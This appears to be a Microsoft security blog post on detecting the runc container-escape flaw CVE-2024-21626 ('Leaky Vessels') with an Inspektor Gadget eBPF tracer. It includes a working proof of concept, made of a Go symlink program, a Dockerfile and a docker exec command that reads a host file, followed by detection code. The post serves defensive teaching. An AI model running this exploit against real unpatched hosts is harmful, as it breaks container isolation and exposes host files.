On February 20th, Microsoft Defender for Containers released its new sensor component, powered by Inspektor Gadget.
Inspektor Gadget is a Cloud Native Computing Foundation (CNCF) project that aims to change the way we consume and execute eBPF programs by managing its packing, deployment and execution. If you aren't familiar with eBPF, you can read more about it on ebpf.io, but in short – eBPF allows us to execute sandboxed programs that extends the Linux kernel without having to change it. In this post we will use eBPF to attach to a tracepoint event when a specific system call is made by a process.
Our new sensor uses Inspektor Gadget as its instrumentation layer - allowing us to collect events at the Kernel space and analyze them to provide security insights on workloads running in Kubernetes (insights include those from the host as well as at the container level).
This blog post will focus on how the Defender for Containers sensor leverages Inspektor Gadget applications running in Kubernetes by detecting vulnerabilities at runtime. We will first learn about a recent vulnerability and how we can exploit it at runtime. Then, we will see how Inspektor Gadget helps us to write an eBPF program that can detect this exploitation attempt.
A good way to understand the risks in running containers is to understand what "container escape" is. While some refer to containers as sandboxed or isolated processes, for linux-based container runtimes, this is an incorrect assumption. Container escape is when a malicious actor can breach the isolation boundaries of a container and gain access to the host. A good way to demonstrate container escape is to look at some known vulnerabilities. On January 31st, 2024, NIST published CVE-2024-21626, also known as "Leaky Vessels", a vulnerability in runc – the most popular "low-level" container runtime. This vulnerability is described as a way to "breakout through process.cwd trickery and leaked fds". The use of the word "trickery" here is both cool and terrifying. It means it's easy to demonstrate this (as we'll do in this blog post), but this also means it is really easy for attackers to use as well, hence the high severity score of this vulnerability. Without going into too much detail, this vulnerability relies on the fact that runc, prior to v1.1.12, doesn't close a "leaked" file descriptor in a timely manner when creating or executing commands inside the container, causing the container to inherit that file descriptor and gain access to the host filesystem.
Let’s start by building a simple go program that creates a symbolic link to the soon to be leaked file descriptor. Creating the symbolic link doesn’t require the file descriptor to be leaked when the container is instantiated.
package main
import (
"fmt"
"os"
"os/signal"
"syscall"
)
func main() {
// Create a symbolic link /host to /proc/self/fd/7
err := os.Symlink("/proc/self/fd/7", "/host")
if err != nil {
fmt.Println("Error creating symlink:", err)
return
}
exit := make(chan os.Signal, 1)
signal.Notify(exit, syscall.SIGINT, syscall.SIGTERM)
<-exit
}
Now let’s write a Dockerfile that builds this image:
FROM golang:1.22 AS builder
WORKDIR /app
COPY go.mod ./
COPY . .
RUN go build -o main .
FROM ubuntu:latest
COPY --from=builder /app/main /usr/local/bin/main
ENTRYPOINT ["/usr/local/bin/main"]
Let’s build the image and run it:
docker build -t cve-2024-21626 .
docker run --rm --name cve-2024-21626 cve-2024-21626
Let’s create a file in our host filesystem and see if we can access it later:
echo “TOP SECRET” >> /tmp/my_secret
And now, using docker exec, let’s access the host filesystem by changing the current working directory to the symlink we created:
docker exec -it -w /host cve-2024-21626 cat ../../../tmp/my_secret
As you can see, this results in the contents of the file we created earlier on the host filesystem. Spooky.
So far, we built an app that intentionally creates a symlink to the leaked file descriptor. While creating a symlink by itself isn’t a malicious activity, it's not typical for most applications to intentionally create symbolic links to files within /proc/self/fd/.
Based on that, for our “detection” let’s create a simple eBPF program that records symlinkat syscalls. For simplicity, we 1) will ignore symlink() syscalls and 2) we will record all symlinkat() syscalls (Meaning we won’t compare the symlink target to /proc/self/fd). It is important to note that the eBPF program we are about to build, is far from being a complete detection.
To build this eBPF program, we will use Inspektor Gadget! Inspektor Gadget offers lots of cool built-in gadgets (which are essentially eBPF programs). However, at the time of writing this post, Inspektor Gadget doesn’t have a built-in gadget to trace symlink syscalls. Therefore, we will have to write our own eBPF gadget for this purpose. But fear not, writing new gadgets is the fun part!
Let’s begin writing our gadget. First, we want to model the event we will be recording. All we really need for our simple detection, is to know that a symlink occurred, the symlink target and to be able to track that syscall back to the container that did that. We will see how Inspektor Gadget helps to enrich events with the data about the container.
Our event struct consists of two members:
#define NAME_MAX 255
struct event {
__u8 oldname[NAME_MAX];
gadget_mntns_id mntns_id;
};
We want to send the events collected by our gadget from the kernel to the user-space for logging. To do that, we use a mechanism known as a buffer. There are two kinds of buffers that can be used:
Ring buffer is a newer mechanism, introduced in Linux 5.8, which is more performant for kernel to user-space data exchange.
With that in mind, let’s define a buffer and send the events to it. We will use Inspektor Gadget to define the buffer and later interact with it. What it does under the hood is to choose whether to use the ring buffer or fall back to the legacy perf buffer.
To define the buffer:
GADGET_TRACER_MAP(events, 1024 * 256);
Now let’s get to the part where we attach to symlinkat syscall tracepoint. We will hook to the sys_enter_symlinkat which is a hook that instruments our gadget code before the symlinkat syscall happens.
SEC("tracepoint/syscalls/sys_enter_symlinkat"
int enter_symlinkat(struct syscall_trace_enter *ctx)
{
...
}
Remember the mntns_id member we defined? Now it’s time to populate it.
We will use gadget_get_mntns_id() function for getting the current mount namespace. Inspektor Gadget uses this to enrich the event, at user space, with container runtime information, like the container name, image name, runtime and more.
In addition, we are interested only in events that originate from containers. We will use the gadget_should_discard_mntns_id() to make sure we capture only events that originated from containers!
u64 mntns_id;
mntns_id = gadget_get_mntns_id();
if (gadget_should_discard_mntns_id(mntns_id))
return 0;
Now all that’s left is to record the symbolic link’s target and send it to the user space through the buffer we defined before. To do that, we will use gadget_reserve_buf()to reserve the memory for the event we are about to write to the gadget buffer. And in order to write the event we will use gadget_submit_buf().
struct event *event;
event = gadget_reserve_buf(&events, sizeof(*event));
if (!event)
return 0;
event->mntns_id = mntns_id;
bpf_core_read_user_str(&event->oldname, sizeof(event->oldname), (void *)ctx->args[0]);
gadget_submit_buf(ctx, &events, event, sizeof(*event));
return 0;
Here's the complete gadget code, which we will save to program.bpf.c:
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <gadget/buffer.h>
#include <gadget/macros.h>
#include <gadget/mntns_filter.h>
#include <gadget/types.h>
#define NAME_MAX 255
struct event {
gadget_mntns_id mntns_id;
__u8 oldname[NAME_MAX];
};
GADGET_TRACER_MAP(events, 1024 * 256);
GADGET_TRACER(symlink, events, event);
SEC("tracepoint/syscalls/sys_enter_symlinkat")
int enter_symlinkat(struct syscall_trace_enter *ctx)
{
u64 mntns_id;
struct event *event;
mntns_id = gadget_get_mntns_id();
if (gadget_should_discard_mntns_id(mntns_id))
return 0;
event = gadget_reserve_buf(&events, sizeof(*event));
if (!event)
return 0;
event->mntns_id = mntns_id;
bpf_core_read_user_str(&event->oldname, sizeof(event->oldname), (void *)ctx->args[0]);
gadget_submit_buf(ctx, &events, event, sizeof(*event));
return 0;
}
char LICENSE[] SEC("license") = "GPL";
Now it’s time to build the gadget and execute it. For this purpose, I’ll be using the ig CLI.
At the time of writing this (Inspektor Gadget v0.27.0), building and executing gadget images is an “experimental feature” so we will have to set the IG_EXPERIMENTAL environment variable to true to use it.
export IG_EXPERIMENTAL=true
Now let’s build the gadget:
sudo -E ig image build -t trace-symlink:latest .
And now we can start it by:
sudo -E ig run trace-symlink:latest
If we start the leaky-app container from above, the gadget’s output is:
INFO[0000] Experimental features enabled
RUNTIME.CONTAINERNAME MNTNS_ID OLDNAME
cve-2024-21626 4026532150 /proc/self/fd/7
Which shows the container named cve-2024-21626 invoked the symlinkat syscall with /proc/self/fd/7 as the target, which is most likely an attempt to exploit CVE-2024-21626. We can (and should) add more tracepoints to get more signals on other exploitation attempts of this vulnerability.
All code examples above are also available on GitHub.
In this blog post, we learned what “container escape” is through getting to know CVE-2024-21626. We then wrote an eBPF program using Inspektor Gadget to detect the exploitation attempt.
How can Microsoft Defender for Cloud help?
Microsoft Defender for Containers, detect exposures of known and zero days vulnerabilities. In addition, it detects execution of malicious containers, like in those simulated in this post. To learn more about Microsoft Defender’s support for container security.
To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog, Microsoft Defender for Cloud - Microsoft Community Hub and to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.